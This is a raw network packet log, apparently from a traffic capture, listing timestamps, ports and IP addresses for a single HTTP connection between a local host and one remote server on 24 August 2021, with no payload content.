Aug 24, 2021 08:46:50.606991053 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.607007980 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.607007980 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.607028008 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.607045889 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.607059956 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.607060909 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.607079029 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.607100010 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.607140064 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.607146978 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.607167006 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.607186079 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.607202053 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.607212067 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.607214928 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.607228041 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.607244968 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.607247114 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.607260942 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.607273102 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.607275963 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.607292891 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.607302904 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.607309103 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.607358932 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.607382059 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.629415989 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.629441977 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.629455090 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.629482985 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.629554987 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.629607916 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.629647017 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.629664898 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.629681110 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.629740953 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.629801989 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.629822016 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.629837990 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.629857063 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.629873991 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.629882097 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.629890919 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.629909039 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.629924059 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.629925013 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.629939079 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.629952908 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.629966974 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.629980087 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.629995108 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.630014896 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.630053997 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.630124092 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.630289078 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.630306959 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.630353928 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.630464077 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.630481958 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.630497932 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.630515099 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.630531073 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.630538940 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.630549908 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.630568027 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.630584002 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.630589962 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.630597115 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.630652905 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.652029037 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.652074099 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.652096987 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.652118921 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.652179003 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.652262926 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.652326107 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.652373075 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.652396917 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.652419090 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.652456045 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.652483940 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.652496099 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.652518988 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.652539015 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.652563095 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.652586937 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.652648926 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.652757883 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.652790070 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.652817965 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.652844906 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.652870893 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.652870893 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.652898073 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.652921915 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.652949095 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.652973890 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.652975082 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.653063059 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.653090954 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.653110027 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.653151035 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.653286934 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.653326988 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.653356075 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.653383970 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.653390884 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.653410912 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.653430939 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.653439045 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.653467894 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.653497934 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.653510094 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.653542995 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.675384045 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.675422907 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.675445080 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.675467968 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.675489902 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.675515890 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.675519943 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.675539017 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.675564051 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.675575018 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.675590038 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.675600052 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.675614119 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.675635099 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.675657988 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.675658941 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.675681114 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.675700903 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.675702095 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.675724983 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.675749063 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.675767899 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.675774097 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.675798893 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.675801992 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.675821066 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.675832033 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.675844908 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.675905943 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.676014900 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.676038980 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.676060915 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.676081896 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.676085949 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.676110983 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.676134109 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.676153898 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.676163912 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.676171064 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.676191092 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.676219940 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.676244020 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.676270962 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.676270962 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.676300049 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.676318884 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.676325083 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.676351070 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.676354885 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.676402092 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.698652029 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.698689938 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.698715925 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.698738098 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.698759079 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.698760986 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.698786020 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.698801994 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.698808908 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.698832035 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.698836088 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.698853016 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.698875904 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.698879004 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.698909044 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.698930979 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.698946953 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.698964119 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.698981047 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.699002028 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.699019909 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.699043036 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.699044943 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.699067116 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.699081898 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.699090958 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.699131966 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.699134111 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.699157000 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.699174881 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.699196100 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.699198008 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.699214935 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.699233055 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.699249983 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.699250937 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.699268103 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.699281931 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.699285030 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.699301958 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.699311972 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.699318886 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.699341059 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.699345112 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.699354887 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.699373960 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.699382067 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.699434042 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.723011017 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.723053932 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.723086119 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.723110914 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.723151922 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.723170042 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.723190069 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.723198891 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.723226070 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.723252058 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.723274946 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.723278046 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.723304033 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.723304987 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.723330975 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.723346949 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.723356962 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.723381042 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.723398924 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.723412037 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.723438025 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.723464012 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.723480940 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.723489046 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.723514080 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.723516941 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.723536015 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.723556042 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.723560095 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.723591089 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.723598957 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.723628998 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.723673105 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.723689079 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.723711967 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.723748922 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.723788023 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.723803997 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.723829985 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.723834038 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.723870039 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.723907948 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.723947048 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.723953009 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.723985910 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.723994970 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.724009037 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.724031925 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.724056959 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.724057913 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.724163055 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.747486115 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.747528076 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.747553110 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.747579098 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.747598886 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.747615099 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.747622967 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.747648001 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.747648954 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.747672081 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.747699022 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.747714043 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.747724056 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.747752905 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.747755051 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.747778893 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.747778893 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.747798920 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.747826099 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.747833967 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.747850895 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.747873068 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.747879982 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.747905970 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.747931004 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.747931004 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.747955084 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.747980118 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.747980118 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.748006105 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.748028994 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.748032093 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.748060942 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.748083115 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.748089075 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.748114109 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.748136997 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.748161077 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.748174906 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.748187065 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.748210907 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.748231888 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.748245955 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.748255014 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.748279095 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.748284101 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.748301983 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.748323917 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.748346090 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.748346090 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.748380899 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.748390913 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.748446941 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.773138046 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.773180008 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.773206949 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.773232937 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.773262978 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.773284912 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.773292065 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.773324013 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.773351908 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.773375034 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.773379087 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.773406982 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.773410082 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.773436069 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.773463964 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.773463964 CEST	49715	80	192.168.2.7	212.224.105.79
